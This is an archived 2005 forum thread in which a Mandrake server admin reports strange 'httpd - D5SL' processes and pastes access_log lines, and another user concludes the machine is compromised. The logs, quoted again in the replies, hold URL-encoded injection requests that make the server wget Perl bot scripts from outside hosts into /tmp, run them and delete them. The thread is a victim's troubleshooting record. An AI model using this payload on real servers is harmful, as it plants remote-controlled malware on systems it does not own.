Welcome to MobyThreads.com!
FAQFAQ      ProfileProfile    Private MessagesPrivate Messages   Log inLog in
All support for the MobyThreads Threaded phpBB MOD can now be found on welsolutions at this forum

strange apache processes

  
   Web Hosting and Web Master Forums (Home) -> Apache RSS
Next:  IUSR password needs resetting every reboot  
Author Message
khorne_fr1

External


Since: Dec 08, 2004
Posts: 6



(Msg. 1) Posted: Thu Jan 20, 2005 6:35 am
Post subject: strange apache processes
Archived from groups: alt>apache>configuration (more info?)
Hi,


I work on apache on a mandrake 10.1 and I found that apache launch strange
processes

Normal processes under mandrake look like this:

httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2 -DHAVE_PHP4 -DHAVE_ACCESS -DHAVE ...

But few minutes after starting apache, apache launch processes like this
/usr/local/apache/bin/httpd -DSSL
/usr/local/apache/bin/httpd - D55L
/usr/local/apache/bin/httpd - D5SL

This processes don't stop when I stop apache and I can't restart apache
until I kill them.
And of course there is no httpd files under /usr/local/apache/bin/ directory

I think it's a virus or a worm.

Below is some few lines from access_log

127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
/your_server_is_infected_by_shanty.html?iID=188&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 404 364 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:52:12 +0100] "GET
/?t=13714&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET
/?t=6&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:12 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:13 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:46:30 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"


Thanks for your help,


Khorne

 >> Stay informed about: strange apache processes 
Back to top
Login to vote
davideyeahsure

External


Since: Nov 03, 2003
Posts: 2907



(Msg. 2) Posted: Thu Jan 20, 2005 8:35 am
Post subject: Re: strange apache processes [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)
On 2005-01-20, Khorne <khorne_fr1.DeleteThis@hotmail.com> wrote:
 > But few minutes after starting apache, apache launch processes like this
 > /usr/local/apache/bin/httpd -DSSL

What a ps -ef | grep httpd shows?

 > And of course there is no httpd files under /usr/local/apache/bin/ directory

Then is trying to run a process that doesn't exist. I don't think that is
apache the culprit.

 > Below is some few lines from access_log
 > 127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
 > /your_server_is_infected_by_shanty.html?iID=188&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b

It looks like some kind of virus. Checked on google?

Davide

--
Bang on the LEFT side of your computer to restart Windows.<!-- ~MESSAGE_AFTER~ -->

 >> Stay informed about: strange apache processes 
Back to top
Login to vote
khorne_fr1

External


Since: Dec 08, 2004
Posts: 6



(Msg. 3) Posted: Thu Jan 20, 2005 9:35 am
Post subject: Re: strange apache processes [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)
That's what ps -ef | grep httpd shows:

root 19995 1 0 13:15 ? 00:00:00 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20024 19995 0 13:15 ? 00:00:06 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20056 19995 0 13:15 ? 00:00:01 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20331 19995 0 13:36 ? 00:00:05 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20332 19995 0 13:36 ? 00:00:02 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20333 19995 0 13:36 ? 00:00:02 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20334 19995 0 13:36 ? 00:00:04 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20335 19995 0 13:36 ? 00:00:03 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20337 19995 0 13:36 ? 00:00:03 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20436 1 0 13:42 ? 00:00:05
/usr/local/apache/bin/httpd - D5SL
apache 20507 19995 0 13:54 ? 00:00:02 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20557 1 0 13:55 ? 00:00:03
/usr/local/apache/bin/httpd - D5SL
apache 20605 19995 0 13:55 ? 00:00:01 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20778 19995 0 14:12 ? 00:00:00 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20927 19995 0 14:25 ? 00:00:00 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
root 20931 20928 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd)
2>&1
root 20932 20931 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd)
2>&1
root 20934 20932 0 14:25 ? 00:00:00 grep httpd


I've been searchig on google about this for a worm or virus, but I didn"t
find something.

Is there a kick solution to block this processes until a find a real
solution?


"Davide Bianchi" <davideyeahsure.TakeThisOut@onlyforfun.net> a écrit dans le message de
news: slrncuv7vv.186.davideyeahsure.TakeThisOut@fogg.onlyforfun.net...
 > On 2005-01-20, Khorne <khorne_fr1.TakeThisOut@hotmail.com> wrote:
  >> But few minutes after starting apache, apache launch processes like this
  >> /usr/local/apache/bin/httpd -DSSL
 >
 > What a ps -ef | grep httpd shows?
 >
  >> And of course there is no httpd files under /usr/local/apache/bin/
  >> directory
 >
 > Then is trying to run a process that doesn't exist. I don't think that is
 > apache the culprit.
 >
  >> Below is some few lines from access_log
  >> 127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
  >> /your_server_is_infected_by_shanty.html?iID=188&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b
 >
 > It looks like some kind of virus. Checked on google?
 >
 > Davide
 >
 > --
 > Bang on the LEFT side of your computer to restart Windows.<!-- ~MESSAGE_AFTER~ -->
 >> Stay informed about: strange apache processes 
Back to top
Login to vote
davideyeahsure

External


Since: Nov 03, 2003
Posts: 2907



(Msg. 4) Posted: Thu Jan 20, 2005 11:35 am
Post subject: Re: strange apache processes [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)
On 2005-01-20, Khorne <khorne_fr1.RemoveThis@hotmail.com> wrote:
 > That's what ps -ef | grep httpd shows:
 >
 > root 19995 1 0 13:15 ? 00:00:00 httpd2 -f
 > /etc/httpd/conf/httpd2.conf -DAPACHE2...
 > apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f
 > /etc/httpd/conf/httpd2.conf -DAPACHE2...

 > apache 20436 1 0 13:42 ? 00:00:05
 > /usr/local/apache/bin/httpd - D5SL
 > apache 20557 1 0 13:55 ? 00:00:03
 > /usr/local/apache/bin/httpd - D5SL

Ok, the first one is the 'correct' apache, the second one
is evidently a bugged version or the clear indication that your
machine have been hacked.

 > Is there a kick solution to block this processes until a find a real
 > solution?

Yes, pull the plug on your machine, boot from a clean media, mount
the partition read-only.

Davide

--
Windows Tip of the Day:
Add DEVICE=FNGRCROS.SYS to your CONFIG.SYS file.<!-- ~MESSAGE_AFTER~ -->
 >> Stay informed about: strange apache processes 
Back to top
Login to vote
Display posts from previous:   
Related Topics:
smp apache processes problem - Hi, I don't know if my question is off-topic, but here goes: I have apache-1.3.29 running on a single cpu P4 with Slackware 9.0 installed with kernel 2.4.20. The apache binary is compiled on this machine. I the same binary (scp-ed) running on a dual....

Apache with to many processes. Load average 8-12 - Hi there, I have a website running on the latest apache 1.x version. The page recives quite a bit of traffic but system is usuallya at about 0.7 load average. Sometimes, like now, the traffic is a bit higher and the system goes up till 12 which does..

"Normal" number of Apache processes? - What is a fairly "normal" number of Apache process to be running at any one time? My server typically has anywhere from 35-105 processes (more at peak periods). I'm running Apache v2.0.46 on a RedHet EL3 dedicated server: Dual Xeon 2.8 GHz Ser...

Performance Monitor - Apache Processes/threads? - Hi all Im using perfmon and the % process time counter to monitor apache process CPU utilisation, but I am having trouble interpreting the figures... I have captured data on the following processes: apache, avg=0, max=0 apache#1, avg=173,max=199..

Apache 1.3 Processes Staying Open Too Long or Forever. - Help! Im running Apache/1.3.27 Red-Hat 7.3 Linux. Now here's my problem, I was running everything fine until the site started getting a few more hits, then apache would stop responding to new requests. Seems the problem is Apache isnt closing unuse..
   Web Hosting and Web Master Forums (Home) -> Apache All times are: Pacific Time (US & Canada) (change)
Page 1 of 1

 
 You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



[ Contact us | Terms of Service/Privacy Policy ]